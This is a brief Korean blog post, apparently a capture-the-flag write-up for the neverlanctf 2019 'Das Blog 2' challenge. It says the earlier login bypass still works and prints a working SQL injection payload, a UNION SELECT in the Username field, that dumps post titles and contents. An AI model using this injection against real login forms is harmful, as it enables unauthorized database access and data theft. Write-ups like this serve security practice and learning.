Notice
Recent Posts
Recent Comments
Link
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Archives
Today
Total
관리 메뉴

White Security

neverlanctf 2019 - Das Blog 2 writeup 본문

CTF Writups

neverlanctf 2019 - Das Blog 2 writeup

POSIX 2019. 2. 4. 18:30


Das Blog 에서 개선된 문제라고 합니다.



이전과 마찬가지로 로그인 페이지가

존재하는 것을 볼 수 있습니다.



폼도 동일하고

심지어 완전히 같은 쿼리로

플래그를 얻어낼 수 있었습니다.


submit=Login&Password=&Username=' union select group_concat(0xa,a,0x3a,b),2 from (select title a,content as b from posts)x;%00



Comments